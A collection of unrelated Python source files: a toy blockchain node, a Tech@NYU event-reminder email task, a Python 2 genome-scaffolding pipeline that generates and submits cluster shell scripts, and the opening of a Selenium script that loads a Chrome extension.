message = {'id': self.current_id_count, 'chain': self.chain.to_json(), 'ring': json.dumps(self.ring)};
message = json.dumps(message);
crT = threading.Thread(target=self.dummy, args = (self.current_id_count, 100, ))
crT.start();
sendInfo = threading.Thread(target = self.dummy2, args=(str(self.current_id_count), newNodeIp,newNodePort, newNodeAddress,))
sendInfo.start();
self.current_id_count += 1;
return message;
def reconstructChain(self, chainJson):
#input is a json. outputs a Blockchain Object
chainDict = json.loads(chainJson);
newL = chainDict['length'];
newList = chainDict['listOfBlocks']
temp = [];
for blockStr in newList:
blockDict = json.loads(blockStr)
tempBlock = self.reconstructBlock(blockDict);
temp.append(tempBlock);
return blockchain.blockchain(newL, temp)
def reconstructBlock(self, blockDict):
#input is a dictionary. outputs a Block Object
tempBlock = block.Block();
tempBlock.creator = blockDict['creator']
tempBlock.current_hash = blockDict['current_hash'];
tempBlock.index = blockDict['index'];
tempBlock.nonce = blockDict['nonce'];
tempBlock.previous_hash = blockDict['previous_hash'];
tempBlock.timestamp = blockDict['timestamp'];
tempBlock.listOfTransactions = [];
for transDict in blockDict['listOfTransactions']:
tempTrans = self.reconstructTrans(transDict);
tempBlock.listOfTransactions.append(tempTrans)
return tempBlock;
def reconstructTrans(self, transDict):
#input is a dictionary. outputs a Transaction Object
tempTrans = transaction.Transaction('0', '0', self.myWallet.address, 0);
tempTrans.amount = transDict['amount'];
tempTrans.receiver_address = transDict['receiver_address'];
tempTrans.sender_address = transDict['sender_address'];
tempTrans.signature = transDict['signature'];
tempTrans.transaction_id = transDict['transaction_id'];
tempTrans.transaction_inputs = transDict['transaction_inputs'];
tempTrans.transaction_outputs = transDict['transaction_outputs'];
return tempTrans;
def create_transaction(self, receiver, amount):
# creating a new transaction and broadcasting it
inputUTXOS = [];
outputUTXOS = [];
myAmount = 0;
for utxo in self.myWallet.transactions:
myAmount += utxo['amount'];
inputUTXOS.append(utxo);
if myAmount >= amount:
break;
for utxo in inputUTXOS:
self.myWallet.transactions.remove(utxo);
self.ring[str(self.id)]['utxos'].remove(utxo)
newTrans = transaction.Transaction(self.myWallet.address, self.myWallet.private_key, self.ring[str(receiver)]['address'], amount, receiverID = str(receiver), senderID = str(self.id), inputs = inputUTXOS);
outputUTXOS = newTrans.transaction_outputs;
for utxo in outputUTXOS:
self.ring[utxo['id']]['utxos'].append(utxo);
if utxo['id'] == str(self.id):
self.myWallet.transactions.append(utxo);
self.broadcast_transaction(newTrans);
self.currentBlock.add_transaction(newTrans);
if len(self.currentBlock.listOfTransactions) == constants.CAPACITY:
self.mining = True;
self.allow.clear();
stM = threading.Thread(target = self.dummy3);
stM.start()
def broadcast_transaction(self, trans):
# sending the transaction to every node in the ring
for k in self.ring:
if k != str(self.id):
url = "http://" + self.ring[k]['ip'] + ":" + str(self.ring[k]['port']) +"/receiveTransaction";
requestData = json.dumps(trans.to_dict());
requests.post(url, data = requestData);
def add_transaction_to_block(self, transDict):
#adding a transaction to the bloc. if number_of_transactions == CAPACITY mine
newTrans = self.reconstructTrans(transDict);
if self.validate_transaction(newTrans):
self.currentBlock.add_transaction(newTrans);
for utxo in newTrans.transaction_inputs:
self.ring[utxo['id']]['utxos'].remove(utxo);
for utxo in newTrans.transaction_outputs:
self.ring[utxo['id']]['utxos'].append(utxo);
if utxo['id'] == str(self.id):
self.myWallet.transactions.append(utxo)
if len(self.currentBlock.listOfTransactions) == constants.CAPACITY:
self.mining = True;
self.allow.clear()
stM = threading.Thread(target = self.dummy3);
stM.start();
def mine_block(self):
# change the status of this node to mining and start looking for the nonce
self.mining = True;
self.otherNodeMined.clear();
while self.currentBlock.current_hash[:constants.MINING_DIFFICULTY] != '0' * constants.MINING_DIFFICULTY and not self.otherNodeMined.is_set():
self.currentBlock.nonce +=1;
self.currentBlock.current_hash = self.currentBlock.myHash();
self.mining = False;
if not self.otherNodeMined.is_set():
self.chain.add_block(self.currentBlock)
self.broadcast_block();
self.currentBlock = self.create_new_block();
self.allow.set();
def broadcast_block(self):
# sending the block to every node in the ring
for k in self.ring:
if k != str(self.id):
url = "http://" + self.ring[k]['ip'] + ":" + str(self.ring[k]['port']) +"/receiveBlock";
requestData = self.currentBlock.to_json();
requests.post(url, data = requestData);
def valid_proof(self, blockToCheck):
# checking the validity of a received block
return blockToCheck.current_hash[:constants.MINING_DIFFICULTY] == '0' * constants.MINING_DIFFICULTY and blockToCheck.previous_hash == self.chain.lastBlock().current_hash
def valid_chain(self, chain):
#checking validity of chain
noElem = len(chain.listOfBlocks);
for i in range(1, noElem):
if not chain.listOfBlocks[i].previous_hash == chain.listOfBlocks[i - 1].current_hash:
return False;
return True;
def resolve_conflicts(self):
# asking all the nodes for the length of their chains and picking the longest
maxLength = self.chain.length;
maxChain = {};
for k in self.ring:
if k != str(self.id):
url = "http://" + self.ring[k]['ip'] + ":" + str(self.ring[k]['port']) +"/printChain";
response = requests.get(url);
responseDict = json.loads(response.json());
if int(responseDict['length']) > maxLength:
maxChain = responseDict;
maxLength = int(responseDict['length']);
if maxLength > self.chain.length:
self.chain = self.reconstructChain(json.dumps(maxChain));
|
reminder.py | import os
import requests
from datetime import datetime
from dateutil.parser import parse
from dateutil import tz
from pytz import timezone
from threading import Thread
from overlord import celery
from utils import Event, Email, headers
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
class ReminderEmail(Email):
def _get_time(self):
"""
Changes UTC time fetched from the API to New York Time
"""
date_time = self.event_data[0]['attributes']['startDateTime']
time = parse(date_time).replace(tzinfo=tz.gettz('UTC'))
central_time = time.astimezone(tz.gettz('America/New_York'))
return ":".join(str(central_time.time()).split(":")[0:2])
def _get_emails(self, event_id):
res = requests.get('https://api.tnyu.org/v3/events/' + event_id +
'?include=rsvps', headers=headers, verify=False)
if res.status_code != 200:
return
r = res.json()
self.event_data.append(r['data'])
for post in r['included']:
if post['attributes'].get('contact'):
if post['attributes']['roles']:
self.eboard_members.append(post)
else:
self.attendees.append(post)
def _venue_address(self):
venue_id = self.event_data[0]['relationships'][
'venue']['data']['id']
venue = requests.get(
"https://api.tnyu.org/v3/venues/" + venue_id, headers=headers)
address = venue.json()['data']['attributes']['address']
address_str = "\n".join(address.split(","))
return address_str
def _generate_emails(self, members):
address = self._venue_address()
time = self._get_time()
for i, member in enumerate(members):
msg = MIMEMultipart('alternative')
msg['Subject'] = "Confirmation for Tech@NYU's " + self.event_data[0]['attributes']['title']
msg['From'] = "Tech@NYU Feedback <" + os.environ['TNYU_EMAIL'] +">"
msg['To'] = members[i]['attributes']['contact']['email']
text = ("Hi " + members[i]['attributes']['name'] + "!\n\n" +
"This is your confirmation for the Tech@NYU " +
self.event_data[0]['attributes']['title'] + " tomorrow at " +
time + ". The event will be held at: \n\n" + address +
"\n\nWe look forward to seeing you! Feel free to reach out" +
" to us if you have any other questions. For more updates" +
" feel free to follow us on Twitter or Facebook. \n\n" +
"Thank you")
address_str = ''
for item in address.split('\n'):
address_str += item.strip() + "<br>"
html = (
"<html>" +
"<head></head>" +
"<body>" +
"<p>Hi " + members[i]['attributes']['name'] + "!</p>" +
"<p>This is your confirmation for the Tech@NYU " +
self.event_data[0]['attributes']['title'] + " tomorrow at " +
time + ". The event will be held at:</p>" +
"<p>" + address_str + "</p>" +
"<p>We look forward to seeing you! Feel free to reach out " +
"to us if you have any other questions. For more updates " +
"feel free to follow us on <a href='https://twitter.com/techatnyu'>Twitter</a> or <a href='https://www.facebook.com/TechatNYU/'>Facebook</a>.</p>"+
"<p>Thank you</p>"
"</body>" +
"</html>")
part1 = MIMEText(text, 'plain')
part2 = MIMEText(html, 'html')
msg.attach(part1)
msg.attach(part2)
try:
err = self.server.sendmail(os.environ['TNYU_EMAIL'], members[i][
'attributes']['contact']['email'], msg.as_string())
if err:
print(err)
except UnicodeEncodeError:
continue
def send_emails(self, event_id):
self._get_emails(event_id)
self._generate_emails(self.eboard_members)
self._generate_emails(self.attendees)
def get_resource(sort=None):
root_url = "https://api.tnyu.org/v3/events/"
r = requests.get(root_url + "?sort=-" + sort, headers=headers)
return r.json()
def get_events_in_future():
resources = get_resource(sort="startDateTime")['data']
events = [Event(x) for x in resources]
# Change UTC to New York Time
today = timezone("America/New_York").localize(datetime.today()).date()
future_events = []
for event in events:
startDateTime = getattr(event, 'startDateTime', None)
if startDateTime:
event_date = parse(event.startDateTime).replace(tzinfo=tz.gettz('UTC')).astimezone(tz.gettz('America/New_York')).date()
# Check if the event is tomorrow
if (event_date - today).days == 1:
future_events.append(event)
return future_events
@celery.task
def send_emails():
emails = ReminderEmail()
events = get_events_in_future()
for event in events:
thr = Thread(target=emails.send_emails, args=[event.id])
thr.start()
return len(events)
|
genomeScaffolding.py | import subprocess, os, sys
from collections import defaultdict, OrderedDict
import numpy as np
from multiprocessing import Pool, Queue, Process
from threading import Thread
import subprocess,shutil
from pybedtools import BedTool
from jcvi.formats import gff
from pyfaidx import Fasta
import time
"""python genomeScaffolding.py ReferenceBuild sampleBuild CDSProtID OldCDSGeneName protID1 weight1 protID2 weight2 ..."""
CDSgeneNaming = sys.argv[4]
CDSspecies = sys.argv[3]
args = sys.argv[5:]
root = os.getcwd()+'/'
weights = OrderedDict()
listSamplesv0 = [folder for folder in os.listdir('v0') if folder.endswith('v0')]
try:
ReferenceBuild = int(sys.argv[1])
except:
ReferenceBuild = 1
try:
sampleBuild = int(sys.argv[2])
except:
sampleBuild = 1
print args
print CDSgeneNaming
print CDSspecies
for i in np.arange(0,len(args),2):
try:
weights[args[i]]=int(args[i+1])
except:
print args
print weights
runCommand = lambda x: subprocess.call(x,shell=True)
binbash = "#!/bin/bash"
makeTrashFolder = 'mkdir oldFiles'
moduleLoads = """module load cufflinks/2.2.1
module load samtools/1.3.1
module load gmap
module load parallel/20150222
module load bedtools/2.25.0
module unload gcc
module load gcc/6.3.0
"""
def runCommands(q):
while not q.empty():
print q
try:
print q.get()
runCommand(q.get())
except:
with open('Error.txt','a') as f:
f.write(q.get()+'\n')
q.task_done()
def buildReferences(reference): # essentially keys of weights
global root
global binbash, makeTrashFolder, moduleLoads
print reference
os.chdir('./referenceGenomes/'+reference)
#print os.getcwd()
#print os.listdir('.')
fastaOld = [fasta for fasta in os.listdir('.') if 'cds' not in fasta.lower() and (fasta.endswith('.fa') or fasta.endswith('.fasta'))][0]
#Fasta(fastaOld)
#gff.load([file for file in os.listdir('.') if 'cufflinks' not in file and (file.endswith('.gff3') or file.endswith('.gff'))][0])
writeCommands = [binbash,moduleLoads,makeTrashFolder,'samtools faidx %s'%fastaOld,
'python -m jcvi.formats.gff load %s %s --parents=mRNA --children=CDS -o %s'%([file for file in os.listdir('.') if 'cufflinks' not in file and (file.endswith('.gff3') or file.endswith('.gff'))][0],fastaOld,reference+'.cds'),
'python -m jcvi.formats.gff bed --type=mRNA --key=Name %s -o %s'%([file for file in os.listdir('.') if 'cufflinks' not in file and (file.endswith('.gff3') or file.endswith('.gff'))][0],reference+'.bed'),
'python %sreplacepath.py %s'%(root,reference+'.bed'),'mv %s %s ..'%(reference+'.bed',reference+'.cds')]
#binbash,makeTrashFolder,moduleLoads,
#print '\n'.join(writeCommands)
"""if __name__ == '__main__':
q = Queue(maxsize=0)
for command in writeCommands:
q.put(command)
runCommands(q)"""
"""for command in writeCommands:
print command
try:
runCommand(command)
except:
with open('Error.txt','a') as f:
f.write(command+'\n')"""
"""for i, command in writeCommands:
print command
if (i == 3 or i==4) and (reference + '.bed' not in os.listdir('..') or os.stat('../'+reference + '.bed').st_size == 0):
runCommand(command)
elif i == 2 and (reference + '.cds' not in os.listdir('..') or os.stat('../'+reference + '.cds').st_size == 0):
runCommand(command)
elif i not in range(2, 7):
runCommand(command)"""
with open('buildReference.sh','w') as f:
f.write('\n'.join(writeCommands))
subprocess.call(['nohup','sh','buildReference.sh'])
os.chdir(root)
#print ReferenceBuild
CDSOld = [fasta for fasta in os.listdir('./referenceGenomes/%s'%CDSspecies) if 'cds' in fasta.lower() and (fasta.endswith('.fa') or fasta.endswith('.fasta'))][0]
linkReferences = ['ln -s %s%s/%s.cds %s.cds\nln -s %s%s/%s.bed %s.bed'%(root,'referenceGenomes',ref,ref,root,'referenceGenomes',ref,ref) for ref in weights.keys()]
def buildSamplesv0(sample): #sample = Bdist_xxx_v0.fa
global root
global CDSspecies, CDSOld
global binbash, makeTrashFolder, moduleLoads
global CDSgeneNaming, linkReferences
print sample
os.chdir('v0/'+sample)
fastaNew = sample+'.fa'
geneNaming = sample.replace('_','') # -t is number of worker threads
runCommand('rm finishBuild.txt')
writeCommands = [binbash,moduleLoads,makeTrashFolder,'rm -r %s %s.gff3.db %s.chromosome *.iit %s.coords'%(geneNaming,geneNaming,geneNaming,geneNaming),
'samtools faidx %s' %fastaNew,
'gmap_build --dir=. -d %s %s' % (geneNaming,fastaNew),
'gmap --dir=. -d %s -B 5 -A --format=gff3_gene -n 1 -t 6 %s > %s 2> %s' % (
geneNaming, '../../referenceGenomes/%s/'%CDSspecies + CDSOld, geneNaming + '.gff3', geneNaming + '.log'),
'python %srenameGenes.py %s %s %s' %(root,geneNaming + '.gff3', CDSgeneNaming ,geneNaming),
'python -m jcvi.formats.gff bed --type=mRNA --key=Name %s -o %s' % (geneNaming + '.gff3', sample + '.bed'),
'python -m jcvi.formats.gff load %s %s --parents=mRNA --children=CDS -o %s' % (
geneNaming+'.gff3', fastaNew,sample + '.cds')]+linkReferences+['> finishBuild.txt']
#"""'python %sgff2CDSBed.py %s'%(root,geneNaming + '.gff3'),'sortBed -i %s.CDS.bed > %s.CDS2.bed'%(geneNaming,geneNaming),
#'python %sformatBed.py s %s v0 1'%(root,geneNaming+'.CDS2'),'bedtools getfasta -name -fi ./%s -bed %s.CDS2.bed -fo %s.cds'%(fastaNew,geneNaming,sample)
#]"""#'mv %s %s ..'%(sample+'.cds',sample+'.bed') binbash, moduleLoads, makeTrashFolder,
#'python -m jcvi.formats.gff load %s %s --feature=CDS --id_attribute=Name -o %s' % (geneNaming + '.gff3', fastaNew,sample + '.cds'),
#'mergeBed -c 4 -i %s.CDS2.bed > %s.CDS.bed'%(geneNaming,geneNaming)
#print writeCommands
#print os.getcwd()
#open('buildSample.sh', 'w').close()
"""if __name__ == '__main__':
q = Queue(maxsize=0)
for command in writeCommands:
q.put(command)
runCommands(q)"""
i=0
"""
for command in writeCommands:
#print i,command
#print i
if (i == 2 or i == 3 or i == 4) and (geneNaming + '.gff3' not in os.listdir('.') or os.stat(geneNaming + '.gff3').st_size ==0):
print(command)
runCommand(command)
elif i==5 and (sample + '.bed' not in os.listdir('.') or os.stat(sample + '.bed').st_size ==0):
print(command)
runCommand(command)
elif i == 6 and (sample + '.cds' not in os.listdir('.') or os.stat(sample + '.cds').st_size ==0):
print(command)
runCommand(command)
elif i not in range(2,7):
print(command)
runCommand(command)
i+=1
"""
with open('buildSample.sh', 'w') as f:
f.write('\n'.join(writeCommands))
#subprocess.call(['nohup', 'sh', 'buildSample.sh'])
runCommand('qsub -P plant-analysis.p -N %s -cwd -l high.c -pe pe_slots 16 -e %s %s' % (
'build'+sample.split('_')[1], 'ErrFile.txt', 'buildSample.sh'))
while True:
if os.path.isfile('finishBuild.txt'):
break
else:
time.sleep(10)
os.chdir(root)
"""try:
runCommand(command)
except:
with open('Error.txt','a') as f:
f.write(command+'\n')"""
"""with open('buildSample.sh','w') as f:
f.write('\n'.join(writeCommands))
try:
subprocess.call(['nohup','sh','buildSample.sh'])
except:
with open('output.txt', 'a') as f:
f.write('Error in %s'%sample)"""
"""writeCommands2 = [binbash, moduleLoads,'gmap_build --dir=. -d %s %s' % (geneNaming,fastaNew),
'gmap --dir=. -d %s -B 5 -A --format=gff3_gene -n 1 -t 8 %s > %s 2> %s' % (
geneNaming, CDSOld, geneNaming + '.gff3', geneNaming + '.log'),
'python %srenameGenes.py %s %s %s' % (root, geneNaming + '.gff3', CDSgeneNaming, geneNaming),
'python -m jcvi.formats.gff bed --type=mRNA --key=Name %s -o %s' % (
geneNaming + '.gff3', sample + '.bed'),
'python -m jcvi.formats.gff bed --type=CDS --key=Name %s -o %s' % (
geneNaming + '.gff3', sample + '.CDS.bed'),
'bedtools getfasta -name -fi ./%s -bed %s.CDS.bed -fo %s.cds' % (
fastaNew, sample, sample)]
with open('buildSample.sh', 'w') as f:
f.write('\n'.join(writeCommands2))
subprocess.call(['nohup', 'sh', 'buildSample.sh'])"""
try:
os.mkdir('v1')
for folder in listSamplesv0:
os.mkdir('v1/%s'%folder.replace('v0','v1'))
os.mkdir('v1/%s/OldFiles'%folder.replace('v0','v1'))
except:
pass
buildCorrespondence = {folder:folder.replace('v0','v1') for folder in listSamplesv0}
listSamplesv1 = buildCorrespondence.values()
print listSamplesv1
def replaceGeneNames(sample,ref,count=0,nuc=0):
refGeneCount = 0
synmap = '%s.%s.lifted.anchors' % (sample, ref)
if nuc:
nucAdd = 'nuc'
synmap = 'nucMap.bed'
refbed = ref + '_nucSyn.bed'
sampbed = sample + '_nucSyn.bed'
a, b = 1, 0
else:
nucAdd = ''
refbed = ref + '.bed'
sampbed = sample + '.bed'
a, b = 0, 1
sampleProt = sample.split('_')[1]
with open(refbed,'r') as f:
refBedLines = f.readlines()
refBedOut = []
refGenes = defaultdict(list)
for line in refBedLines:
if line:
refGenes[line.split('\t')[3]] = ref+nucAdd+'_'+str(refGeneCount)
refBedOut.append(line.replace(line.split('\t')[3],ref+nucAdd+'_'+str(refGeneCount)))
refGeneCount+=1
#ref+'_syn'+'.bed',sample+'_%ssyn'%ref+'.bed'
#print refGenes
with open(sampbed,'r') as f:
sampBedLines = f.readlines()
sampBedOut = []
sampGenes = defaultdict(list)
for line in sampBedLines:
if line:
sampGenes[line.split('\t')[3]] = sampleProt+nucAdd+'_'+str(count)
sampBedOut.append(line.replace(line.split('\t')[3], sampleProt + nucAdd + '_' + str(count)))
count+=1
with open(synmap,'r') as f:
synRead = f.readlines()
synOut = []
for line in synRead:
if line and '###' not in line:
try:
genes = line.split('\t')
print genes
synOut.append(line.replace(genes[0],refGenes[genes[a]]).replace(genes[1],sampGenes[genes[b]]))
except:
with open('Err.txt','a') as f:
f.write(line+'\n')
"""
if nuc:
print sampBedOut[0:10]
print refBedOut[0:10]
print sampGenes.items()[0:10]
print refGenes.items()[0:10]
print synOut[0:10]
with open('nucMap.bed','r') as f:
print f.readlines()[0:10]
"""
if nuc == 0:
for writeTuple in [(ref+'_syn'+'.bed',refBedOut),(sample+'_%ssyn'%ref+'.bed',sampBedOut),(synmap,synOut)]:
with open(writeTuple[0],'w') as f:
f.writelines(writeTuple[1])
else:
for writeTuple in [(refbed,refBedOut),(sampbed,sampBedOut),(synmap,synOut)]:
with open(writeTuple[0],'w') as f:
f.writelines(writeTuple[1])
return count
def tiling2bed(tilingFile,ref,sample,sampBed):
with open(tilingFile,'r') as f:
tilingLines = f.read().split('\n')
genesDict = defaultdict(list)
with open(ref+'_nucSyn.bed','w') as f1, open(sample+'_nucSyn.bed','w') as f2:
for line in tilingLines:
if line:
lineList = line.split('\t')
int1 = sorted(map(int,lineList[0:2]))
int1[0] -= 1
int2 = sorted(map(int,lineList[2:4]))
int2[0] -= 1
f1.write('\t'.join([lineList[-2]]+map(str,int1)+['_'.join([lineList[-2]]+map(str,int1)),'0','+']) + '\n')
f2.write('\t'.join([lineList[-1]]+map(str,int2)+['_'.join([lineList[-1]]+map(str,int2)),'0','+']) + '\n')
genesDict['_'.join([lineList[-1]]+map(str,int2))] = '_'.join([lineList[-2]]+map(str,int1))
b = BedTool(sample+'_nucSyn.bed').subtract(BedTool(sampBed),A=True)
#print b.head()
#print genesDict.keys()[0:10]
origGenes = set(genesDict.keys())
#print str(b).split('\n')[0:10]
#print [ line.split('\t')[3] for line in str(b).split('\n') if line][0:10]
remainGenes = set([ line.split('\t')[3] for line in str(b).split('\n') if line])
#print list(remainGenes)[0:10]
BadGenes = list(origGenes - remainGenes)
#print BadGenes[0:10]
#print len(origGenes), len(remainGenes), len(BadGenes)
#exit()
for gene in BadGenes:
try:
del genesDict[gene]
except:
pass
with open('nucMap.bed','w') as f:
f.write('\n'.join('%s\t%s\t100'%item for item in genesDict.items() if item))
fastaNucOld = [fasta for fasta in os.listdir('./referenceGenomes/%s'%CDSspecies) if 'cds' not in fasta.lower() and (fasta.endswith('.fa') or fasta.endswith('.fasta'))][0]
def generatev1(sample):
os.chdir('v0/%s'%sample)
print sample.replace('v0', 'v1')
global binbash, makeTrashFolder, moduleLoads, root, weights, fastaNucOld, CDSspecies
#print weights
print '\n'.join('%s %d'%(key,weights[key]) for key in weights.keys())#weights.keys()#'\n'.join('%s %d'%(key,weights[key]) for key in sorted(weights, key=weights.get, reverse=True).keys())
print 'hi'
"""if __name__ == '__main__':
p = Pool(None)
p.imap(pairwise, [(sample,ref) for ref in weights.keys()])"""
with open('weights.txt','w') as f:
f.write('\n'.join([weights.keys()[0]+' %d'%weights[weights.keys()[0]],'%snuc %d'%(CDSspecies,weights[CDSspecies]-1)]+['%s %d'%(key,weights[key]) for key in weights.keys()[1:]]))
nucCommands = [binbash,moduleLoads]+ ['nucmer -t 6 -p %s %s %s'%(CDSspecies+'nuc',root+'referenceGenomes/%s/'%CDSspecies+fastaNucOld,sample+'.fa'),
'delta-filter -m -q -i 85 -u 50 %snuc.delta > %snuc2.delta'%(CDSspecies,CDSspecies),'show-tiling -a %snuc2.delta > %snuc.tiling'%(CDSspecies,CDSspecies)]
commands1 = [binbash, moduleLoads]+['rm *.anchors *.last *.filtered *.prj']+\
['nohup python -m jcvi.compara.catalog ortholog %s %s\nmv %s %s'%(ref,sample,'%s.%s.lifted.anchors'%(ref,sample),'%s.%s.lifted.anchors'%(sample,ref)) for ref in weights.keys()]
commands2=[binbash, moduleLoads]+['rm multipleMapping.bed','\n'.join('python -m jcvi.assembly.syntenypath bed %s --switch --scale=10000 --qbed=%s --sbed=%s -o %s'%('%s.%s.lifted.anchors'%(sample,ref),ref+'_syn'+'.bed',sample+'_%ssyn'%ref+'.bed','%s.synteny.bed'%(ref)) for ref in weights.keys()),
'python -m jcvi.assembly.syntenypath bed %s --switch --scale=10000 --qbed=%s --sbed=%s -o %snuc.synteny.bed'%('nucMap.bed',CDSspecies+'_nucSyn.bed',sample+'_nucSyn.bed',CDSspecies),
'nohup python -m jcvi.assembly.allmaps mergebed %s -o %s'%(' '.join(['%s.synteny.bed'%(ref) for ref in (weights.keys() + [CDSspecies+'nuc'])]),'multipleMapping.bed')]
qsub=[binbash,moduleLoads]+['python -m jcvi.assembly.allmaps path --skipconcorde --cpus=32 --ngen=300 --npop=50 multipleMapping.bed %s.fa' % (sample),
'mv multipleMapping.fasta %sv1/%s/%s.fa' % (root,sample.replace('v0', 'v1'), sample.replace('v0', 'v1'))]
#'nohup liftOver -gff %s.gff3 multipleMapping.chain %s.gff3 unmapped' % (sample.replace('_',''), sample.replace('_','').replace('v0', 'v1')), ,'mv %s.gff3 ../../v1/%s' % (sample.replace('_','').replace('v0', 'v1'), sample.replace('v0', 'v1'))
#for ref in weights.keys():
# pairwise((sample,ref))
"""if __name__ == '__main__':
q = Queue(maxsize=0)
for command in commands:
q.put(command)
runCommands(q)"""
#print '\n'.join(commands)
with open('nucCommand.sh','w') as f:
f.write('\n'.join(nucCommands))
with open('constructv1_1.sh','w') as f:
f.write('\n'.join(commands1))
with open('constructv1_2.sh','w') as f:
f.write('\n'.join(commands2))
with open('qsub_buildv1.sh','w') as f:
f.write('\n'.join(qsub))
print os.listdir('%s/v1/%s'%(root,sample.replace('v0','v1')))
if '%snuc.tiling'%CDSspecies not in os.listdir('.'):
runCommand('sh nucCommand.sh')
#print ['%s.%s.lifted.anchors' %(sample, ref) in os.listdir('.') and os.stat('%s.%s.lifted.anchors' %(sample, ref)).st_size > 0 for ref in weights.keys()]
print all(['%s.%s.lifted.anchors' %(sample, ref) in os.listdir('.') and os.stat('%s.%s.lifted.anchors' %(sample, ref)).st_size > 0 for ref in weights.keys()]) == 0
#exit()
if all([os.path.isfile('%s.%s.lifted.anchors' %(sample, ref)) and os.stat('%s.%s.lifted.anchors' %(sample, ref)).st_size > 0 for ref in weights.keys()]) == 0:
print sample, ['%s.%s.lifted.anchors' %(sample, ref) in os.listdir('.') and os.stat('%s.%s.lifted.anchors' %(sample, ref)).st_size > 0 for ref in weights.keys()]
runCommand('sh constructv1_1.sh')
sampleCount = 0
for ref in weights.keys():
sampleCount = replaceGeneNames(sample, ref, sampleCount)
print 'hello ' + sample, ref
print 'construct_1' + sample + ' done'
try:
tiling2bed('%snuc.tiling'%CDSspecies, CDSspecies, sample, sample+'_%ssyn'%CDSspecies+'.bed')
except:
print sys.exc_info()[0]
#exit()
print 'hi2'
replaceGeneNames(sample,CDSspecies,0,1)
if os.stat('nucMap.bed').st_size == 0:
exit()
print 'hi3'
runCommand('sh constructv1_2.sh')
try:
if os.stat('./multipleMapping.bed').st_size > 0:
runCommand('qsub -P plant-analysis.p -N %s -cwd -l h_rt=50:00:00 -pe pe_slots 32 -e %s %s'%(sample,'ErrFile.txt','qsub_buildv1.sh')) #FIXME pe_slots 16, time limit pe_8
else:
with open('ErrFile.txt','a') as f:
f.write('Multiple Mapping Size 0, unable to build v1...')
except:
with open('ErrFile.txt', 'a') as f:
f.write('Multiple Mapping File does not exist, unable to build v1...')
os.chdir(root)
#for command in commands:
# print command
# runCommand(command)
#FIXME ADD qsub
def formatSamplev0(sample):
global root
commands = ['python %sformatBed.py s %s v0'%(root,sample),'python %sformatCDS.py s %s v0'%(root,sample)]
for command in commands:
runCommand(command)
os.chdir(root)
def formatRef(reference):
global root
commands = ['python %sformatBed.py r %s v0' % (root, reference), 'python %sformatCDS.py r %s v0' % (root, reference)]
for command in commands:
runCommand(command)
os.chdir(root)
sampleDist = [listSamplesv0[x:x+7] for x in xrange(0,len(listSamplesv0),7)]
print sampleDist
def buildSampv0List(samplist):
for sample in samplist:
try:
buildSamplesv0(sample)
except:
print 'Error building ' + sample
def formatv0List(samplist):
for sample in samplist:
try:
formatSamplev0(sample)
except:
print 'Error formatting ' + sample
if __name__ == '__main__':
with open('output.txt', 'a') as f:
f.write('Outv1')
listSamplesv0 = [sample for sample in listSamplesv0 if sample.replace('v0', 'v1') + '.fa' not in os.listdir(
'%sv1/%s' % (root, sample.replace('v0', 'v1')))]
print len(listSamplesv0) // 6 + 1
sampleDist = [listSamplesv0[x:x + len(listSamplesv0) // 6 + 1] for x in
xrange(0, len(listSamplesv0), len(listSamplesv0) // 6 + 1)]
print listSamplesv0
print sampleDist
if ReferenceBuild:
p = Pool(processes=6)
p.map(buildReferences, weights.keys())
p.map(func=formatRef, iterable=weights.keys())
p.close()
p.join()
if sampleBuild:
p = Pool(processes=6)#processes=8
p.map_async(func=buildSampv0List, iterable=sampleDist)
p.map_async(func=formatv0List, iterable=sampleDist)
p.close()
p.join()
#for samplelist in sampleDist:
# p.map(generatev1, samplelist)
#for ref in weights.keys():
# formatRef(ref)
#buildReferences('460')
#formatRef('460')
def reader(q):
while True:
sample = q.get()
try:
generatev1(sample)
except:
print 'Generation Error in ' + sample
with open('Error.txt', 'a') as f:
f.write('Generation Error in ' + sample + '\n')
q.task_done()
def genv1List(samplelist):
for sample in samplelist:
#generatev1(sample)
try:
generatev1(sample)
except:
print 'Error gen v1 in ' + sample
if __name__ == '__main__':
#for samplelist in sampleDist:
#q = Queue(maxsize=0)
#num_threads = 6
#for i in range(num_threads):
# worker = Process(target = reader,args=(q,))
# worker.daemon=True
# worker.start()
listSamplesv0 = [sample for sample in listSamplesv0 if sample.replace('v0','v1') + '.fa' not in os.listdir('%sv1/%s'%(root,sample.replace('v0','v1')))]
print len(listSamplesv0)//6 + 1
sampleDist = [listSamplesv0[x:x + len(listSamplesv0)//6 + 1] for x in xrange(0, len(listSamplesv0), len(listSamplesv0)//6 + 1)]
p = Pool()
p.map_async(genv1List,sampleDist)
#for sample in samplelist:
# p.map(generatev1,args=(sample,))
p.close()
p.join()
#for sample in samplelist:
# q.put(sample)
#q.join()
"""try:
generatev1(sample)
break
except:
print 'Generation Error in '+ sample
with open('Error.txt','a') as f:
f.write('Generation Error in '+ sample + '\n')
break
"""
"""'gffread -E %s -o- > %s' % (geneNaming + '.gff3', sample + '.cufflinks.gff'),
'python %sgff2CDSBed.py %s.cufflinks.gff' % (root, sample),
'gffread -E %s -o- > %s' % (geneNaming + '.gff3', sample + '.cufflinks.gff'),
'gffread -E %s -o- > %s'%([file for file in os.listdir('.') if 'cufflinks' not in file and (file.endswith('.gff3') or file.endswith('.gff'))][0],reference+'.cufflinks.gff'),
'gffread %s -x %s -g %s'%(reference+'.cufflinks.gff',reference+'.cds',fastaOld),
'python %sgff2CDSBed.py %s.cufflinks.gff'%(root,sample),
'bedtools getfasta -name -fi ./%s -bed %s.cufflinks.CDS.bed -fo %s.cds'%(fastaNew,sample,sample), """ |
seleniumBasic.py | from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.chrome.options import Options
import time
from sys import platform
from multiprocessing import Process, Queue
import traceback
import logging
import numpy as np
import random
unpackedExtensionPath = "../src"
if platform == "linux" or platform == "linux2":
# linux
chromeDriverPath = '/home/schasins/Downloads/chromedriver'
extensionkey = "clelgfmpjhkenbpdddjihmokjgooedpl"
elif platform == "darwin":
# OS X
chromeDriverPath = '/Users/schasins/Downloads/chromedriver'
extensionkey = "bcnlebcnondcgcmmkcnmepgnamoekjnn"
def newDriver(profile):
chrome_options = Options()
chrome_options.add_argument("--load-extension=" + unpackedExtensionPath)
chrome_options.add_argument("user-data-dir=profiles/" + profile)
driver = webdriver.Chrome(chromeDriverPath, chrome_options=chrome_options)
driver.get("chrome-extension://" + extensionkey + "/pages/mainpanel.html")
return driver
def runScrapingProgram(profile, progId, optionsStr):
driver = newDriver(profile)
